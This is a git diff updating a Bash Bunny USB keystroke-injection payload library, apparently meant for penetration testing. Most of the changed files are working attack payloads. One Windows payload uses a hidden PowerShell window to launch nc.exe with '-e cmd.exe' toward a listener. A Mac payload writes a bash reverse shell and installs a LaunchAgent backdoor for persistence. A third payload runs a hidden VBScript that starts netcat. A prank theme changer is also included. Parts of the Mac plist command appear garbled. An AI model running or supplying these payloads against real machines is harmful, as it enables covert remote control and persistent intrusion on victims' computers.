diff --git a/payloads/library/execution/RAZ_VBScript/a.vbs b/payloads/library/execution/RAZ_VBScript/a.vbs index fd1a23a6..7d669b42 100644 --- a/payloads/library/execution/RAZ_VBScript/a.vbs +++ b/payloads/library/execution/RAZ_VBScript/a.vbs @@ -3,7 +3,7 @@ Option Explicit '============================================================================== ' Title: a.vbs ' Author: RalphyZ -' Version: 1.0 +' Version: 1.1 ' Target: Windows 7+ ' ' Description: @@ -16,7 +16,8 @@ Option Explicit ' listeners while doing a PenTest, and grab multiple reverse ' shells in one trip. Uncomment that if you want the auto-increment ' -' Note: You must put the netcat executable in the strReverseShellPath directory +' Note: You must put the netcat executable in the switch directory with this +' script in order for it to work '============================================================================== ' Declare Constants @@ -26,14 +27,11 @@ Const ForWriting = 2 ' Declare Global Variables Dim strListenerPort, strNewListenerPort, strListenerIP Dim objFSO, objFile, strCurrentDirectory -Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile +Dim strNetCatEXE, strListnerPortFile, strListenerIPFile ' The netcat executable name strNetCatEXE = "nc.exe" -' The folder location -strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" - ' The file containing the listener port strListnerPortFile = "listener_port.txt" @@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt" ' Create a File System Object Set objFSO = CreateObject("Scripting.FileSystemObject") -strCurrentDirectory = FindCurrentDirectory() +' Set default value +strCurrentDirectory = "" + +' The folder location +FindCurrentDirectory ' Read the Host IP Address (where the listener resides) ReadHostIP @@ -64,20 +66,21 @@ StartNetCat ' Return Value: None ' Description: Find the netcat executable '============================================================================== -Function FindCurrentDirectory +sub FindCurrentDirectory Dim objDrives, d - - ' Set default return value - FindCurrentDirectory = "" - + ' Search all drives for the netcat exe Set objDrives = objFSO.Drives - For Each d in objDrives - If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then - FindCurrentDirectory = d + strReverseShellPath + For Each d in objDrives + If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch1\" + exit sub + ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch2\" + exit sub End if Next -End Function +End Sub '============================================================================== ' Name: ReadHostIP diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index b395f94f..ab24bd09 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt @@ -2,34 +2,45 @@ # # Title: RAZ_VBScript # Author: RalphyZ -# Version: 1.0 +# Version: 1.1 # Target: Windows 7+ # Dependencies: VBScript (a.vbs) in the switch folder with this file # # Description: Executes a VBScript, concealed in a hidden PowerShell window # # Colors: -# Green.....................Working -# White.....................Completed without error -# Light-Blue (blinking).....a.vbs was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL | Red slow blink | Could not find the a.vbs script | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | -LED G +# Magenta solid +LED SETUP + +# Set the attack mode ATTACKMODE HID STORAGE # Get the switch position -source bunny_helpers.sh +GET SWITCH_POSITION -# Check if a.vbs is present -if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then - LED B G 100 + Check if a.vbs is present + if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED FAIL exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Run the VBScript QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe" QUACK ENTER -# Green LED for finished -LED R G B \ No newline at end of file + +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/execution/RAZ_VBScript/readme.md b/payloads/library/execution/RAZ_VBScript/readme.md new file mode 100644 index 00000000..3e0287ef --- /dev/null +++ b/payloads/library/execution/RAZ_VBScript/readme.md @@ -0,0 +1,31 @@ +# RAZ_VBScript +* Author: RalphyZ +* Version: 1.1 +* Target: Windows 7+ +* Category: Execution +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +a.vbs - VBScript to be executed in a hidden Powershell window + +## Description +VBScript (a.vbs) in the switch folder with this file + +## Configuration +None + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL | Red slow blink | Could not find the a.vbs script | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file diff --git a/payloads/library/prank/RAZ_ThemeChanger/payload.txt b/payloads/library/prank/RAZ_ThemeChanger/payload.txt new file mode 100644 index 00000000..58e61540 --- /dev/null +++ b/payloads/library/prank/RAZ_ThemeChanger/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Change windows theme +# Author: sil3n7h +# Version: 1.2 +# Target: Windows 7+ +# +# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder +# in the payloads library of the Bash Bunny USB Disk partition. +# +# Colors: +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the theme.themepack file | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +# Magenta solid +LED SETUP + +# Get the switch position +GET SWITCH_POSITION + +# Check for all the files - error if not found. If found, put into variables +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then + LED FAIL1 + exit 1 +fi + +# Set the attack mode to HID and STORAGE +ATTACKMODE HID STORAGE + +# Yellow single blink +LED ATTACK + +# Run the command to change the theme +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')" +QUACK ENTER + +# Wait a bit so that the correct window closes +QUACK DELAY 15000 +QUACK ALT F4 + +# Green LED for finished +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/RAZ_ThemeChanger/readme.md b/payloads/library/prank/RAZ_ThemeChanger/readme.md new file mode 100644 index 00000000..7d9f2645 --- /dev/null +++ b/payloads/library/prank/RAZ_ThemeChanger/readme.md @@ -0,0 +1,34 @@ +# RAZ_ThemeChanger +* Author: sil3n7h +* Version: 1.2 +* Target: Windows 7+ +* Category: Prank +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ---------------------------------------| +| 1.2 | Updated docs and check for themepack | +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen. + +Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`. + +## Description +Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition. + +## Configuration +None + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL1 | Red slow blink | Could not find the theme.themepack file | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt index 8c370623..2b384024 100644 --- a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt +++ b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt @@ -2,7 +2,7 @@ # # Title: RAZ_MacReverseShell # Author: RalphyZ -# Version: 1.1 +# Version: 1.2 # Target: Mac OSX # Dependencies: None # @@ -12,8 +12,14 @@ # user-defined interval # # Colors: -# Green (blinking)..........Working -# White.....................Completed without error +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +#Magenta solid +LED SETUP # Edit this to point to the NetCat Listener LISTENER_IP="192.168.1.100" @@ -24,15 +30,15 @@ FREQUENCY="60" #----Proceed with Caution------------------------------------------------------ -# Green blinking LED -LED G 100 - # Human Interface Device ATTACKMODE HID # Emulate the Ducky - QUACK! QUACK DEFAULT_DELAY 300 +# Start the attack - yellow single blink +LED ATTACK + # Start the Mac Terminal QUACK COMMAND SPACE QUACK STRING terminal @@ -53,7 +59,7 @@ QUACK ENTER QUACK DELAY 500 # Add to the Launch Agents -QUACK STRING printf \"\\\n \\\n \Label\\\n \com.ralphyz.backdoor\\\n \ProgramArguments\\\n \\\n \/bin/sh\\\n \/tmp/s.sh\\\n \\\n \RunAtLoad\\\n \\\n \StartInterval\\\n \${FREQUENCY}\\\n \AbandonProcessGroup\\\n \\\n \\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist +QUACK STRING printf \"\\\Label\\com.ralphyz.backdoor\\ProgramArguments\\\/bin/sh\\/tmp/s.sh\\\RunAtLoad\\\StartInterval\\${FREQUENCY}\\AbandonProcessGroup\\\\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK ENTER QUACK DELAY 500 @@ -64,5 +70,6 @@ QUACK ENTER # Close the Terminal Window QUACK COMMAND q -# White LED for finished -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/readme.md b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md new file mode 100644 index 00000000..2e02f431 --- /dev/null +++ b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md @@ -0,0 +1,39 @@ +# RAZ_MacReverseShell +* Author: RalphyZ +* Version: Version 1.1.1 +* Target: Mac OSX +* Category: Reverse Shell +* Attackmode: HID + +## Change Log +| Version | Changes | +| ------- | ---------------------------------------- | +| 1.1.1 | Updated for firmware 1.1.1 | +| 1.1 | Added variables for easier customization | +| 1.0 | Initial release | + +## Dependencies +None + +## Description +Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup + +## Configuration +Set the location of your listener: + +LISTENER_IP="192.168.1.100" + +LISTENER_PORT="4444" + + +Set the frequency you want the script to run (in minutes) + +FREQUENCY="60" + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | + diff --git a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt index 8b71a3d0..f97c94d7 100644 --- a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt +++ b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt @@ -13,63 +13,69 @@ # Intentionally, this script leaves a trace in the Run Box # # Colors: -# Green.....................Working -# White.....................Completed without error -# White (blinking)..........Incrementing the port in listener_port.txt -# Blue (blinking)...........listener_port.txt was not found -# Light-Blue (blinking).....listener_ip.txt was not found -# Amber (blinking)..........nc.exe was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the listener_port.txt file | +# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +# | FAIL3 | Red very fast blink | Could not find the nc.exe file | +# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | +# Magenta solid +LED SETUP # Change this if you want to enable auto_increment of the netcat port # If true, the port number is increased by 1 everytime the script runs # This is good for Red Teams doing PenTesting on multiple computers auto_increment=false -LED G +# Set attack mode to HID and Storage ATTACKMODE HID STORAGE -LANGUAGE='us' - # Get the switch position -source bunny_helpers.sh - +GET SWITCH_POSITION # Check for all the files - error if not found. If found, put into variables if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then - LED B 100 + LED FAIL1 exit 1 else my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then - LED B G 100 + LED FAIL2 exit 1 else my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then - LED R G 100 + LED FAIL3 exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Execute the powershell command in the run box with the appropriate variables QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\" QUACK ENTER + # If auto_increment, then update the listener_port file if [ "$auto_increment" = true ] ; then - LED R G B 100 + LED SPECIAL echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt # Allow the write to sync to the USB sleep 1 fi -# Signal everything went OK - white -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH exit 0 diff --git a/payloads/library/remote_access/RAZ_ReverseShell/readme.md b/payloads/library/remote_access/RAZ_ReverseShell/readme.md new file mode 100644 index 00000000..f2f2aa3d --- /dev/null +++ b/payloads/library/remote_access/RAZ_ReverseShell/readme.md @@ -0,0 +1,44 @@ +# RAZ_ReverseShell +* Author: RalphyZ +* Version: 1.1 +* Target: Windows 7+ +* Category: Reverse Shell +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +nc.exe - Windows binary for netcat with the -e flag + +Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat + +listener_port.txt - The Port number for the netcat listener + +listener_ip.txt - The IP Address for the netcat listener + +## Description +Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office. + +## Configuration +Set the location of your listener in the listener_ip and listener_port text files. + +If you want the listener port to auto-increment, set: + +auto_increment=true + +## Colors +| Status | Color | Description | +| ---------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL1 | Red slow blink | Could not find the listener_port.txt file | +| FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +| FAIL3 | Red very fast blink | Could not find the nc.exe file | +| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file